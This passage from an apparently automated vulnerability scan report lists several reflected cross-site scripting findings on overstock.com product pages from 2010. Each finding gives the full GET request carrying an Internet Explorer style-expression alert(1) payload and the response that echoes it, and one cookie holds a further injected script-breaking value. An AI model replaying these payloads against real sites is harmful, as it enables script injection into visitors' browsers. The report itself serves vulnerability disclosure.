Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 16:24:42 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 16:24:42 GMT
Pragma: no-cache
Set-Cookie: cinfo=ccnt^0:ctmst^1289406282184:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:24:42 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: mxcproclicks=4429367|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:24:42 GMT; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=5, max=94
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 110461

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j20.overstock.com ssl:false -->


<head>

<title>AT
...[SNIP]...
<input type="hidden" name="a5723"style="x:expression(alert(1))"dc27975fdfa" value="1"/>
...[SNIP]...

2.133. http://www.overstock.com/Home-Garden/Abstract-Hand-painted-Oil-on-Canvas-Art-Set/4324396/product.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Home-Garden/Abstract-Hand-painted-Oil-on-Canvas-Art-Set/4324396/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ecce7"style%3d"x%3aexpression(alert(1))"5e9cdf261eb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ecce7"style="x:expression(alert(1))"5e9cdf261eb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Home-Garden/Abstract-Hand-painted-Oil-on-Canvas-Art-Set/4324396/product.html?ecce7"style%3d"x%3aexpression(alert(1))"5e9cdf261eb=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 16:30:11 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 16:30:11 GMT
Pragma: no-cache
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: mxcproclicks=4324396|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:30:11 GMT; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289406611040:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:30:11 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=5, max=40
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 106011

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j15.overstock.com ssl:false -->


<head>

<title>Ab
...[SNIP]...
<input type="hidden" name="ecce7"style="x:expression(alert(1))"5e9cdf261eb" value="1"/>
...[SNIP]...

2.134. http://www.overstock.com/Home-Garden/Abstract-Wall-Art/2036145/product.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Home-Garden/Abstract-Wall-Art/2036145/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8923f"style%3d"x%3aexpression(alert(1))"85ef6a8bd2d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 8923f"style="x:expression(alert(1))"85ef6a8bd2d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Home-Garden/Abstract-Wall-Art/2036145/product.html?8923f"style%3d"x%3aexpression(alert(1))"85ef6a8bd2d=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 16:31:03 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 16:31:03 GMT
Pragma: no-cache
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: mxcproclicks=2036145|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:31:03 GMT; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289406663103:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:31:03 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=5, max=22
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 111661

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j15.overstock.com ssl:false -->


<head>

<title>Ab
...[SNIP]...
<input type="hidden" name="8923f"style="x:expression(alert(1))"85ef6a8bd2d" value="1"/>
...[SNIP]...

2.135. http://www.overstock.com/Home-Garden/Algreen-Cascata-65-gallon-Rain-Water-Collection-System/4408338/product.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Home-Garden/Algreen-Cascata-65-gallon-Rain-Water-Collection-System/4408338/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5c15b"style%3d"x%3aexpression(alert(1))"e9ad1dd2c4b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5c15b"style="x:expression(alert(1))"e9ad1dd2c4b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Home-Garden/Algreen-Cascata-65-gallon-Rain-Water-Collection-System/4408338/product.html?5c15b"style%3d"x%3aexpression(alert(1))"e9ad1dd2c4b=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 16:37:02 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 16:37:02 GMT
Pragma: no-cache
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:37:02 GMT; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcproclicks=4408338|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:37:02 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289407022562:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=5, max=66
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 108026

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j19.overstock.com ssl:false -->


<head>

<title>Al
...[SNIP]...
<input type="hidden" name="5c15b"style="x:expression(alert(1))"e9ad1dd2c4b" value="1"/>
...[SNIP]...

2.136. http://www.overstock.com/Home-Garden/All-Directional-Chrome-Showerhead/4688005/product.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Home-Garden/All-Directional-Chrome-Showerhead/4688005/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8af6c"style%3d"x%3aexpression(alert(1))"c395720b29e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 8af6c"style="x:expression(alert(1))"c395720b29e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Home-Garden/All-Directional-Chrome-Showerhead/4688005/product.html?8af6c"style%3d"x%3aexpression(alert(1))"c395720b29e=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 16:37:19 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 16:37:19 GMT
Pragma: no-cache
Set-Cookie: cinfo=ccnt^0:ctmst^1289407039184:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:37:19 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: mxcproclicks=4688005|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:37:19 GMT; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=5, max=85
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 109910

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j20.overstock.com ssl:false -->


<head>

<title>Al
...[SNIP]...
<input type="hidden" name="8af6c"style="x:expression(alert(1))"c395720b29e" value="1"/>
...[SNIP]...

2.137. http://www.overstock.com/Home-Garden/All-Seasons-Down-Alternative-Microfiber-Blanket/4081645/product.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Home-Garden/All-Seasons-Down-Alternative-Microfiber-Blanket/4081645/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e4400"style%3d"x%3aexpression(alert(1))"9ea5e34285 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e4400"style="x:expression(alert(1))"9ea5e34285 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Home-Garden/All-Seasons-Down-Alternative-Microfiber-Blanket/4081645/product.html?e4400"style%3d"x%3aexpression(alert(1))"9ea5e34285=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 16:51:22 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 16:51:22 GMT
Pragma: no-cache
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: mxcproclicks=4081645|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:51:22 GMT; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289407882836:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:51:22 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=5, max=18
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 113635

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j15.overstock.com ssl:false -->


<head>

<title>Al
...[SNIP]...
<input type="hidden" name="e4400"style="x:expression(alert(1))"9ea5e34285" value="1"/>
...[SNIP]...

2.138. http://www.overstock.com/Home-Garden/All-season-Luxurious-Down-Alternative-Comforter/3297897/product.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Home-Garden/All-season-Luxurious-Down-Alternative-Comforter/3297897/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 93008"style%3d"x%3aexpression(alert(1))"f9f5845dae2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 93008"style="x:expression(alert(1))"f9f5845dae2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Home-Garden/All-season-Luxurious-Down-Alternative-Comforter/3297897/product.html?93008"style%3d"x%3aexpression(alert(1))"f9f5845dae2=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 16:42:21 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 16:42:21 GMT
Pragma: no-cache
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:42:21 GMT; Path=/
Set-Cookie: mxcproclicks=3297897|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:42:21 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289407341786:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=5, max=76
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 110903

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j11.overstock.com ssl:false -->


<head>

<title>Al
...[SNIP]...
<input type="hidden" name="93008"style="x:expression(alert(1))"f9f5845dae2" value="1"/>
...[SNIP]...

2.139. http://www.overstock.com/Home-Garden/American-Atelier-16-piece-Abalone-Dinnerware-Set/5197520/product.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Home-Garden/American-Atelier-16-piece-Abalone-Dinnerware-Set/5197520/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b828a"style%3d"x%3aexpression(alert(1))"fb590d8c4d9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b828a"style="x:expression(alert(1))"fb590d8c4d9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Home-Garden/American-Atelier-16-piece-Abalone-Dinnerware-Set/5197520/product.html?b828a"style%3d"x%3aexpression(alert(1))"fb590d8c4d9=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 16:32:37 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 16:32:37 GMT
Pragma: no-cache
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: mxcproclicks=5197520|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:32:37 GMT; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289406757140:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:32:37 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
